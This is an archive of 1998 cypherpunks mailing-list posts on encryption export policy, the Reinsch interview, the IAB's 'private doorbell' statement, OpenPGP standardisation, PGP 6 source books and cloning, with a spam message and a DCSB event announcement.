From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sendus@earthcorp.com
Date: Thu, 15 Oct 1998 09:10:15 +0800
To: <cypherpunks-unedited@toad.com>
Subject: LUGGAGE, GARMENT BAGS, BREIFCASES, ETC.
Message-ID: <199810150039.RAA24551@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear reader,

We have just visited your website and became interested to develop a trading relationship with you company.

We are a major manufacturer of a full range of luggage, bags, and trolleys.For full details 
mailto:sendus@earthcorp.com?Subject=BESTPLUS_IDUSTRIES_LTD.

Thank you very much,

Ms. Anges Lek,
Managing Director


 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 15 Oct 1998 18:51:02 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: DNA (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F84DD@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Mathew James Gering wrote:

>Monozygotic [maternal] twins do have the same DNA. Hence they
>are identical. Genetically identical that is, there are non-genetic
>variations. Dizygotic [fraternal] twins do not. Fraternal twins can 
>be visually nearly identical, but they are not genetically identical.

That's right. "Monozygotic". I'd forgotten the word.

>Clones on the otherhand and have identical nuclear DNA, but
>are notnecessarily identical because some early development
>processes rely on maternal genome material and not nuclear
>DNA, and depending on the cloning process they may have
>different mitochondrial DNA (mtDNA).

Yep - if you mean Dolly-style clones derived from nuclear transplants
into eggs. there was an interesting article in this week's "New
Scientist" magazine
(http://www.newscientist.com/ns/981010/contents.html) about the changing
popular meaning of the word "clone". It was originally used for a group
of plants produced vegetatively, like by cuttings or runners. Then it
was extended to other organisms that can reproduce by division, like
so-called protozoa  Then to DNA replicated from one ancestor. And now to
artificially cloned things like Dolly. 

If you got a Dolly-style clone made from you he or she wouldn't be your
child, but your sibling and wouldn't be identical to you for all the
reasons Matt pointed out. And of course because of different
education/experience/upbringing et.c  nto to mention the knowledge that
they had been got in such a different way, which must do *something* to
the psyche.  (Anyone read "Cyteen" by CJ Cherryh?)

Identical twins of course are a clone in the original sense, just as
much as a variety of apples or a colony of bacteria are a clone.  Really
genetically identical, right down to the maternal contribution, because
they drive from division at an early embryo stage (Sea-urchins can do it
as well but insects can't...)  If it were possible to re-potentiate
adult cells and transform them into embryos (it works in plants - but
then it has to because they can't move cells from one organ to another
so any shoot tip has to be able to produce any kind of plant tissue)
then we could make "real" twin-like clones of humans.  If the search for
the mysterious foetal stem cells pays off that might be possible (though
why anyone would want to clone a human foetus is beyond me. Assume all
the crude jokes about it being more fun to make another one using the
traditional method).


Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J. Hartwell" <billh@ibag.com>
Date: Fri, 16 Oct 1998 00:21:54 +0800
To: cypherpunks@einstein.ssz.com
Subject: Who is next? (re Jim's subpoena)
Message-ID: <3.0.5.32.19981015084148.00943940@mail.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain



This ran through my mind this morning before I was totally awake. Maybe
somebody can help me with the original author of this....


When they came for Kevin Mitnick I said nothing. After all he was a big
time hacker and I wasn't a hacker so I did not speak up.

When they came for Jim Bell I said nothing. He was a criminal and I am not
a criminal so I didn't speak up.

When they came for Toto I said nothing. Surely he was nuts and I am
completely sane so I didn't speak up.

When they came for Jim Choate I said nothing. He runs a cypherpunks mailing
list and I don't manage any lists so I didn't speak up.

When they come for me who will be left to speak up?


This is a poor paraphrase of the original but I wonder if it is something
that we may be saying here in the U.S. soon?

--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Thu, 15 Oct 1998 22:43:46 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: Re: pgp 6 src out
In-Reply-To: <19981015104621.A7198@tightrope.demon.co.uk>
Message-ID: <v03102800b24bb443c1de@[204.1.1.65]>
MIME-Version: 1.0
Content-Type: text/plain



>hmmm pgp 6 source books have been released .. I wonder if there will
>be a pgp 6i unix version now?
>
>--
>1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/
>
>    i was gratified to be able to answer promptly, and i did.  i said i
>didn't know.  -- mark twain

For those who want more details I browsed with DejaNews to find the
original announcement:

>PGP 6.0 Source Books Available

>Author:
>
>               Ed Stone
>Email:
>               nospam@synernet.com
>Date:
>               1998/10/14
>Forums:
>               alt.privacy, alt.security.pgp, comp.security.pgp.discuss
>
>
>
>PGP again releases source code, fathering both free and international
>versions, to the consternation of some bureaucrats and possibly someone
>else.
>
>Printers, Inc. provides the following information:
>
>"Platform Independent $160.00
>Macintosh $160.00
>Windows $180.00
>
>These are all multi-volume ring-bound books of source code.  For each of
>the above, there is a single-volume book of documentation at $25.00 each.
>
>In order to work, the Macintosh and Windows sets both require the
>Platform Independent set.
>
>Shipping is by FedEx (or UPS if you prefer).  It's expensive, but it
>allows us to track the package.
>
>Attached is a sort of form letter on methods of payment.
>
>Yours,
>
>Gary Corduan
>Printers Inc. Bookstore
>
>  -------------------------------
>
>As to payment, you could send us a check for the amount payable to
>`Printers Inc. Bookstore' and addressed to
>
>   310 California Avenue
>   Palo Alto, California 94306
>
>You should probably make the envelope attention to me (Gary Corduan) lest
>it get lost in the shuffle (which _does_ happen, hence the other options
>below which are probably preferable).
>
>If you have a credit card, you can fax the number to us at (650)327-7509.
>The fax machine is in our accounting office, and we can keep your card
>number on file for the next time you order.
>
>Alternatively, you can phone in your card number on our toll-free line at
>1(800)742-0402 and ask for me.  I am usually here on Mondays, Tuesdays,
>Wednesdays, Fridays, and Saturdays.
>
>Whatever option you choose, please e-mail me and let me know (in case the
>check gets lost, the fax machine jams, etc. etc.)."
>
>Email them at pibooks@best.com
>
>--
>--
>-------------------------------
>Ed Stone
>estone@synernet-robin.com
>remove "-birdname" spam avoider
>-------------------------------

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: orowley@imaginemedia.com (Owen Rowley)
Date: Fri, 16 Oct 1998 01:47:07 +0800
To: "William J. Hartwell" <billh@ibag.com>
Subject: Re: Who is next? (re Jim's subpoena)
In-Reply-To: <3.0.5.32.19981015084148.00943940@mail.xroads.com>
Message-ID: <36262FD7.C8BEA9AD@imaginemedia.com>
MIME-Version: 1.0
Content-Type: text/plain




William J. Hartwell wrote:

> This is a poor paraphrase of the original but I wonder if it is something
> that we may be saying here in the U.S. soon?

perhaps the answer is to *NOT BE* in the U.S. when it's being said.

LUX ./. owen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Thu, 15 Oct 1998 18:11:14 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: pgp 6 src out
Message-ID: <19981015104621.A7198@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



hmmm pgp 6 source books have been released .. I wonder if there will
be a pgp 6i unix version now?

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    i was gratified to be able to answer promptly, and i did.  i said i
didn't know.  -- mark twain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 15 Oct 1998 18:10:56 +0800
To: cypherpunks@toad.com
Subject: Re: Use encryption to foil spooks' data harvesting, says US state dept
In-Reply-To: <199810141617.SAA07987@replay.com>
Message-ID: <3625CC35.6635727C@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> http://ds.state.gov/documents/protect.doc

> Many telecommunications transmissions will contain "key words", used to
> identify information of interest to a third party.  A key word can be the
> name of a technology, product, project, or anything else which may identify
> the subject of the transmission.

The communications of criminals are certainly not billions bytes
long but rather short and if they use 'key words' these can hardly 
be detected. This shows the nonsense of prohibiting use (or restricting
export) of strong crypto by the general public and also the total
ineffectivity of wiretapping etc. by the authority.

A tiny history: During WWII there was a time when much commodities
were smuggled between Hongkong and Macao. Letters were subject
to opening by the Japanese occupation. Using 'key words' the 
smugglers of one city put little harmless looking announces in 
local newspapers which the complices at the other city could read 
the next day just as fast as if the information were sent via the post.

This clearly shows that those attempting to push through crypto
laws or regulations have either very low IQ or have high IQ but are
in fact pursuing other (undisclosed) goals than what they publically 
claim (fighting criminality etc.).

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 16 Oct 1998 02:52:12 +0800
To: <cypherpunks@toad.com>
Subject: =?iso-8859-1?Q?Re:_Commerce_Undersecretary_William_Reinsch_defends_the_go?==?iso-8859-1?Q?vernment=92s_encryption_policy?=
Message-ID: <014701bdf868$62b41c20$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



> We want to work through the market. What that means is, if the market
> turns in unexpected directions, we have to be ready to re-evaluate our
> policy. So I don't think you're going to see a "final" version
> ever. As long as the market moves and changes, our policy will be
> tweaked to accommodate what's happening.

In other words ... If we don't approve, it's time to go back to ITAR
and 40-bits.

> I don't think they're doing it just because the government asked them
> to; they're doing it because they see a market.  In addition, in the
> spring the FBI and the Justice Department asked companies to come in
> to see if a technical solution could be found to deal with these
> issues. Companies have done that, too.

It must be nice to be able to pressure and threaten companies behind
the scenes and then come out to the public to say that they are
"cooperating" or "volunteering".

> At the same time, of all the economic sectors in the country, this
> one's moving the fastest. There's a real danger that, if we can't get
> our policy together and out there in the marketplace soon, we could be
> overtaken by events overseas.

In other words, "all this time we've been denying that there was
overseas competition, well, we were lying through our teeth."

"And that thing with the EU complaining about Echelon and the Germans
trying to head up the Europeans to bust ITAR/EAR ..."  Oops!  Can't
say the "E" word in public because "nobody" knows about that!

> I think you have to contrast that situation, which was reasonably
> artificial, with the reality of law enforcement. In this case, it took
> a decent amount of resources to crack a specific message that, I
> believe, the people doing the crack knew was in English, and knew was
> one message.

Must be nice not having real technologists pointing out blatant
flaws/lies in your public statments.

> Now, if you're the FBI, think about that. From their standpoint, we're
> talking about traffic that isn't so easily identifiable. It might be a
> long stream of encrypted material that they're trying to intercept in
> real time; they don't necessarily know what language it's in; they
> don't necessarily know what

Sure ... if the FBI were really stupid ... and the FBI didn't really
want to do any homework, but instead, would rather have NSA's
dictionaries do the walking ...  encryption would be a real bitch,
wouldn't it?  Even 40-bit.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 16 Oct 1998 00:00:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Hollywood on How to Talk to FBI Agents
In-Reply-To: <199810132308.SAA08748@einstein.ssz.com>
Message-ID: <199810151526.LAA21810@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Was watching "One Tough Cop" last weekend starring the younger and less
successful brothers of a couple of male leads.  

An NYC police drama filmed in Toronto.  

The otherwise "B" movie was enlivened by a somewhat less than sympathetic
treatment of the two FBI agents who were leaning on "One Tough Cop."  They
wanted him to plant a bug on his childhood friend who was a member of a
Sicilian social organization.  

The movie also featured two crack heads who raped and murdered a nun.  The
FBI agents got worse screen treatment than the crack heads.  

Our hero's chats with the Fibbies were always laced with strings of
obscenities meant to convey to them that he did not intend to help them.
The film showed that he did not suffer professional reversals because of
his treatment of Fibbies.  

DCF    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 16 Oct 1998 01:31:01 +0800
To: cypherpunks@cyberpass.net
Subject: Evans on tradition, common law & Hayek
Message-ID: <v04020a3fb24bd1d0c7dd@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Thu, 15 Oct 1998 11:43:25 EDT
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Stephen Carson <SWCarson@AOL.COM>
Subject:      Evans on tradition, common law & Hayek
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

     M. Stanton Evans has an excellent discussion of tradition & common
law as it relates to liberty & consent in his _The Theme is Freedom:
Religion, Politics, and the American Tradition_, (1994, Regnery).
Chapter 5 of that book, "The Uses of Tradition", is particularly helpful.
 From that chapter...  [emphases his]

"The reason for this libertarian effect is that the common law created a
tremendous obstacle to the *workings of unchecked power in the state*.
For if the law grew up by way of custom and tradition, over great
intervals of time, then it was not the work of any individual and could
not be changed at anyone's discretion.  It was outside the ordinary
workings of the process, pre-existed the powers of the day, and would
survive them.  This made it superior to the will of any king, or group of
legislators, and gave it independent status."
-p. 80


"...the common law cannot be made over by the decree of any given
individual, group, or even generation.  It consists instead of the
accretion, over time, of ways of thinking and acting that many
generations have accepted.  When you think about it - and the common
lawyers did - this is a *species of consent*.  It means that people are
*voluntarily choosing to do things in a certain way, without any central
direction or design*.  Another common lawyer of the Stuart era, John
Davies, put it as follows:
     'The common law of England is nothing else but the common law and
custom of the realm... A custom taketh beginning and groweth to
perfection in this manner; when a reasonable act once done is found to be
good and beneficial to the people, and agreeable to their nature and
disposition, then they do use and practice it again and again, and so by
often iteration and multiplication of the act it becometh a custom...
customary law is the most perfect and most excellent, and without
comparison the best, to make and preserve a commonwealth.  For the
written laws that are made by either the edict of princes, or by council
of estates [i.e., Parliament] are imposed on the subject before any trial
or probation made, whether the same be fit and agreeable to the nature
and disposition of the people, or whether they will breed any
inconvenience or no.  But a custom doth never become a law to bind the
people, until it had been tried time out of mind...'"
-p. 88


"This notion of *custom as consent*, in contrast to top-down command, is
among the key ideas of the free society.  With the statements of Davies
and Wilson, in fact, we approach the modern exposition of this point by
Hayek, who devotes a series of penetrating essays to the subject.  The
distinctive features of a libertarian regime, Hayek argues, is that it
permits the organization of society by free decision, and that this
results in an ordered system that no single person or even group of
people has designed, and that could not have been created by top-down
methods.  An obvious example is the development of language - a structure
that has grown up over a considerable course of time, invented by nobody
in particular, but used conveniently by many."
-p. 89-90


     I had never quite connected this aspect of consent in with the
common law.  This makes the connection between spontaneous order, custom,
time & consent much clearer to me.

Stephen W. Carson   <mailto:SWCarson@aol.com>

"Premature optimization is the root of all evil" -Donald Knuth

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <nospam@freedom.net>
Date: Fri, 16 Oct 1998 01:19:43 +0800
To: <cypherpunks@toad.com>
Subject: =?iso-8859-1?Q?Commerce_Undersecretary_William_Reinsch_defends_the_govern?==?iso-8859-1?Q?ment=92s_encryption_policy?=
Message-ID: <001a01bdf858$8c15eea0$1901a8c0@austin.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



I especially like the part about DEEPCRACK and how because EFF knew that the
message was in English that it doesn't really prove that the FBI can break
56bit DES encryption.



---------------------------------------------------
http://www.infosecuritymag.com/sept/q%26a.htm
Q & A WITH WILLIAM REINSCH

                             Crypto's Key Man
   Commerce Undersecretary William Reinsch defends the government's
encryption export
                     policy-even though it puts him "in the hot seat."

                                   BY ANDY BRINEY

Q: How would you characterize current U.S. cryptographic export policies?

A: The President has consistently articulated a policy of balance-between
privacy, electronic commerce, law
enforcement and national security. We believe all four elements are
important, and we're trying to produce a policy
that takes all of them into account.

But is it really possible to balance all these issues at the same time?

We think so. I'm not sure the industry agrees with us, and it's not easy.
The privacy issues involved have been
discussed for 50 years in debates about wiretaps and law enforcement devices
for intercepting phone conversations.
Encryption poses some of the same issues: privacy vs. law enforcement. The
country has come to terms with
wiretaps over the years, and people still use phones-even though, with
proper court orders, there's the possibility
that law enforcement could be listening in. We think we'll be able to arrive
at the same common public
understanding with encryption. But there's no question that getting there
will be difficult.

What kind of time frame are we looking at? Is the administration looking at
releasing a "final" crypto export policy
within the next three months? Six months? A year?

The policy I articulated-one of balance-is based on implementations in the
marketplace. We expect the market to
develop the products we like, and we expect that there will be a demand for
the products.

We want to work through the market. What that means is, if the market turns
in unexpected directions, we have to
be ready to re-evaluate our policy. So I don't think you're going to see a
"final" version-ever. As long as the
market moves and changes, our policy will be tweaked to accommodate what's
happening.

In the short run, however, the policy we are currently operating under
expires January 1. We've told industry we
expect to revisit that policy this fall, and make judgments about what's
going to happen after January 1. So we've
committed to trying to come out with the next update, hopefully by Labor
Day, although my expectation is it may
take a little longer than that.

Can you be more explicit about what this policy might entail?

No. Because we're not there yet.

What has been the industry's reaction to current policy?

Industry has been quite active, particularly with submitting key-recovery
plans. We provide more liberalized export
controls for companies that provide plans by which they will build
key-recovery products. We've approved some 55
plans now-with a few more pending.

I don't think they're doing it just because the government asked them to;
they're doing it because they see a market.
In addition, in the spring the FBI and the Justice Department asked
companies to come in to see if a technical
solution could be found to deal with these issues. Companies have done that,
too.

At the same time, of all the economic sectors in the country, this one's
moving the fastest. There's a real danger
that, if we can't get our policy together and out there in the marketplace
soon, we could be overtaken by events
overseas.

Recently, a panel was charged with developing a Federal Information
Processing Standard (FIPS). One of this
group's directives was to design a federal computer security system that
includes back doors-which they failed to
do. What's next for this panel, and for this issue?

My understanding is that, at the request of a majority of the panel's
members, the Secretary [of Commerce] has
extended their charter to the end of the year. The Secretary received a
letter from the panel in which the majority
felt they would be able to complete their work with additional time.
However, they also said they weren't entirely
confident that at the end of the day it would be unanimous product.

Even if it were possible to do key escrow on the scale the government is
asking, would anyone willingly buy such a
product knowing that stronger encryption products without back doors are
available? To prevent this, wouldn't it be
necessary to criminalize the domestic possession of stronger crypto?

First of all, we haven't supported the latter. Second, I think you need to
look at this problem in pieces, not as a
unitary problem. The pieces are: stored data, data in transit (such as
e-mail) and voice communications. I would
argue that with the first two

of those pieces, there's going to be substantial demand in the market for
the kinds of products that are helpful from
our standpoint.

For stored data, we see a demand for key recovery-we're not using the term
"key escrow" much anymore.
Particularly in business and financial institutions, there's a demand for
recovery products, because people want to be
able to access employees' data in the event of accidents or other such
things.

As for e-mail, the most significant development there was the announcement
nine companies made in early July.
Each of these companies submitted an application for a so-called "door bell"
technology, which connotes a variety of
means of recovery at the server level.

What we see developing here is growing use of network encryption-as opposed
to encryption at the PC-for
secure transmission of messages. Employers will want that, for employee
control purposes. From the standpoint of
law enforcement, that's a happy development, because it creates two "third
point" locations-the sender's server
and the recipient's server-that are physically separate from the sender and
recipient of the message. These points
are often controlled by third parties, namely contractors running the
system. So, with the proper court order, law
enforcement could go to those third points and obtain plain-text access.

What was your reaction to the Electronic Frontier Foundation's cracking of
DES in July?

I think you have to contrast that situation, which was reasonably
artificial, with the reality of law enforcement. In
this case, it took a decent amount of resources to crack a specific message
that, I believe, the people doing the
crack knew was in English, and knew was one message.

Now, if you're the FBI, think about that. From their standpoint, we're
talking about traffic that isn't so easily
identifiable. It might be a long stream of encrypted material that they're
trying to intercept in real time; they don't
necessarily know what language it's in; they don't necessarily know what
part of the message is of interest to them;
and they don't know whether it's words or text or graphics or what it might
be. Telling the FBI that, under those
circumstances, you can buy an expensive computer and crack one message in 56
hours-that's not a lot of comfort
to the FBI. And it doesn't seem to me that it should make anybody in the
private sector nervous about the security
of 56-bit products. If that's the best we're going to get-56 hours for a
single message decrypted by equipment
most people don't have and aren't ever going to have-that doesn't exactly
mean that it's an unsecured product.

But it does illustrate a trend. As time passes, it's taking fewer and fewer
resources and less and less time to crack
the same algorithm. In 1997, it took three months. In February, it took 39
days. Now, it's one $250,000 computer and
56 hours. Who's to say in two more months it won't be cracked in an even
shorter amount of time with even fewer
resources?

You can project that curve, and maybe you'll be right. The immediate effect
of that is that it's going to accelerate a
trend that's already begun anyway, which is toward 128-bit products. I think
that's a trend that would have occurred
regardless of this particular event.

The technical people I've talked to say that once you get beyond 90 or 100
bits, it doesn't make all that much
difference because you're talking about brute-force cracking times that are
beyond any real time that you can
imagine. Obviously, the faster you can crack 56 bits, the faster you can
crack 90 or 100. But since each successive
bit doubles your time, by the time you get to 90, I think you're into
thousands of years...

But the question is, assuming that 90 is safe, wouldn't it then be prudent
to have a policy that allows uniform export
of 90-bit products without special dispensation?

I don't think we expect to set bit-length requirements. We believe in the
marketplace deciding what is secure and
what is not. The government is not going to say that 90 is good or 128 is
good...

But right now it's saying 56 is sufficient.

No, the government is saying that 56 can be exported under certain
circumstances. What the government has also
said is that if it's a key-recovery product, it can be exported with any bit
length without constraint. And that's what
we would prefer to focus on-to tell people, if you're product has recovery
features, bit length doesn't matter.
That's the incentive.

What happens if a key-recovery standard cannot be agreed upon? Is there a
fallback plan?

We are doing everything we can to encourage people to find it acceptable and
to get the market to move in that
direction. We think that's what's happening. So I don't think we've
developed a Plan B in that sense.

Can you discuss progress on the Advanced Encryption Standard (AES)?

No. I'm not particularly involved in that. I think you need to talk to some
NIST or NSA people about that.



ALSO

Q: You seem to be the government's point man on encryption policy issues. Is
that a function of your office, your
background, or what?

A: "Designated victim" is the term we use [laughs]. Actually, it's a
function of the office. An integral component of
our policy involves export controls, and the BXA [Bureau of Export
Administration] administers export controls of
dual-use items for the government. So I end up in the hot seat.

EDITOR'S NOTE: Next month, Bruce Schneier, author of the definitive text
Applied Cryptography, will respond to
Undersecretary Reinsch's comments in a special Word in Edgewise article.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 16 Oct 1998 02:08:42 +0800
To: "'cypherpunks'" <cypherpunks@cyberpass.net>
Subject: FW: IAB statement on "private doorbell" encryption
Message-ID: <2C396693FBDED111AEF60000F84104A721C01E@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: 	The IAB[SMTP:iab@ietf.org]
> Sent: 	Thursday, October 15, 1998 9:35 AM
> Subject: 	IAB statement on "private doorbell" encryption
> 
> 
> 
> The IAB and IESG are concerned by published descriptions of the
> "private doorbell" approach to resolving the encryption controversy.
> Essentially, the private doorbell requires that encryption and
> decryption be done at a gateway, rather than at an end system; see
> http://www.cisco.com/warp/public/779/govtaff/policy/paper/paper_index.html
> for one description.  This is in conflict with the "end-to-end"
> principle, a fundamental tenet of the Internet architecture.  While
> there is certainly a place for gateway-based encryption in some
> circumstances, to require it in all places (and to exclude end-to-end
> encryption) would warp the protocol structure.  Furthermore, it
> offers a significantly lower level of security, in that there is
> no longer protection against inside attacks, which by all accounts
> are a serious threat.
> 
> In addition, putting all security at the gateway ignores the need
> for different levels of protection in different situations.  For
> some applications, encryption to the gateway may suffice.  Others
> may require encryption and cryptographic authentication of the
> individual machine or even user.  Should a strong encryption
> algorithm be used, or a very efficient one?  It is very difficult
> to make these decisions anywhere but the end-system.  But the
> "private doorbell" scheme would block deployment of such fine-grained
> protection.
> 
> 
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 16 Oct 1998 02:10:44 +0800
To: "'cypherpunks'" <cypherpunks@cyberpass.net>
Subject: FW: Protocol Action: OpenPGP Message Format to Proposed Standard
Message-ID: <2C396693FBDED111AEF60000F84104A721C01F@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: 	The IESG[SMTP:iesg-secretary@ietf.org]
> Sent: 	Thursday, October 15, 1998 10:27 AM
> Cc: 	RFC Editor; Internet Architecture Board; ietf-open-pgp@imc.org
> Subject: 	Protocol Action: OpenPGP Message Format to Proposed Standard
> 
> 
> 
> The IESG has approved the Internet-Draft 'OpenPGP Message Format'
> <draft-ietf-openpgp-formats-08.txt> as a Proposed Standard.  This
> document is the product of the An Open Specification for Pretty Good
> Privacy Working Group.
> 
> The IESG contact persons are Jeffrey Schiller and Marcus Leech.
> 
> 
>  
> Technical Summary
>  
>   This document defines the formats used by "Phil's Pretty Good
>   Privacy" otherwise known as PGP.
> 
> Working Group Summary
> 
>   After serious discussion the working group came to consensus on this
>   document.
> 
> Protocol Quality
> 
>   The formats used here are the result of a second generation 
>   engineering effort to define an efficient, one pass format for
>   representing information encrypted or signed with PGP. They were
>   reviewed by Jeffrey I. Schiller for the IESG.
> 
> 
> Note to RFC Editor: Please add the following as an IESG Note:
> 
>    This document defines many tag values, yet it doesn't describe a
>    mechanism for adding new tags (for new features). Traditionally the
>    Internet Assigned Numbers Authority (IANA) handles the allocation of 
>    new values for future expansion and RFCs usually define the procedure 
>    to be used by the IANA.  However there are subtle (and not so subtle)
>    interactions that may occur in this protocol between new features and
>    existing features which result in a significant reduction in over all
>    security. Therefore this document does not define an extension
>    procedure. Instead requests to define new tag values (say for new 
>    encryption algorithms for example) should be forwarded to the IESG
>    Security Area Directors for consideration or forwarding to the
>    appropriate IETF Working Group for consideration.
> 
> 
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 16 Oct 1998 02:20:15 +0800
To: cypherpunks@cyberpass.net
Subject: DCSB: Risk Management is Where the Money Is; Trust in Digital Commerce
Message-ID: <v04020a42b24be6c5b515@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Thu, 15 Oct 1998 11:01:58 -0400
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Risk Management is Where the Money Is; Trust in Digital
 Commerce
Cc: Dan Geer <geer@world.std.com>, Terry Symula <symula@ma.ultranet.com>,
        "Heffan, Ira" <HEFFAN@tht.com>, Roland Mueller <roland@secunet.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


          The Digital Commerce Society of Boston

                       Presents

                       Dan Geer
                Senior Strategist and VP,
                       CertCo, Inc.

           Risk Management is Where the Money Is

                Tuesday, November 3rd, 1998
                       12 - 2 PM
             The Downtown Harvard Club of Boston
               One Federal Street, Boston, MA




     The focus of "security" research today is the study of "trust
management," i.e., the study of how trust is created, propagated,
circumscribed, stored, exchanged, accounted for, recalled and adjudicated
in an electronic world.  This is both natural and mature -- natural because
security is a means and not an end, mature because security technology must
differentiate along cost-benefit lines.  All the security technology that
you can buy today enables some aspect of trust management and the academic
and entrepreneurial segments alike are busy supplying many novel ways to
propagate trust.  They have it all wrong.  Trust management is definitely
exciting, but like most exciting ideas it is not important.  What is
important is risk management, the sister, the dual of trust management.
And it is risk management that is the part of financial services that will
drive the security world from here on out whether you realize it or not.


Dan Geer is VP and Senior Strategist for CertCo, Inc., market leader
in digital certification for electronic commerce.  Dan has been at
a number of security oriented startups in the Boston area since
leaving academia where he was Manager of Systems Development for
MIT's Project Athena.  He holds a S.B. in EE/CS from MIT, and a
Sc.D. in Biostatistics from Harvard.  He was deeply involved
in medical computing for fifteen years.  A frequent speaker,
popular teacher and member of several professional societies,
he has been active in USENIX for some years at the Board level.
His recent publications include "The Web Security Sourcebook"
(Wiley, 1997) and the security chapter in Leebaert's "The
Future of the Electronic Marketplace" (MIT, 1998).


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, November 3, 1998, from 12pm - 2pm at the Downtown Branch of
the Harvard Club of Boston, on One Federal Street. The price for lunch
is $32.50. This price includes lunch, room rental, various A/V hardware,
and the speaker's lunch. ;-).  The Harvard Club *does* have dress code:
jackets and ties for men (and no sneakers or jeans), and "appropriate
business attire" (whatever that means), for women.  Fair warning: since
we purchase these luncheons in advance, we will be unable to refund the
price of your lunch if the Club finds you in violation of the dress
code.


We need to receive a company check, or money order, (or, if we
*really* know you, a personal check) payable to "The Harvard Club of
Boston", by Saturday, October 31st, or you won't be on the list for
lunch.  Checks payable to anyone else but The Harvard Club of Boston
will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The
Harvard Club of Boston", in the amount of $32.50. Please include your
e-mail address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements
(We've had to work with glacial A/P departments more than once, for
instance), please let us know via e-mail, and we'll see if we can work
something out.


Upcoming speakers for DCSB are:

December   Joseph DeFeo   TBA
January    Ira Heffan     Internet Software and Business Process Patents
February   Roland Mueller European Privacy Directive

We are actively searching for future speakers.  If you are in Boston
on the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston,
send "info dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> . If you want to subscribe to the DCSB e-mail
list, send "subscribe dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
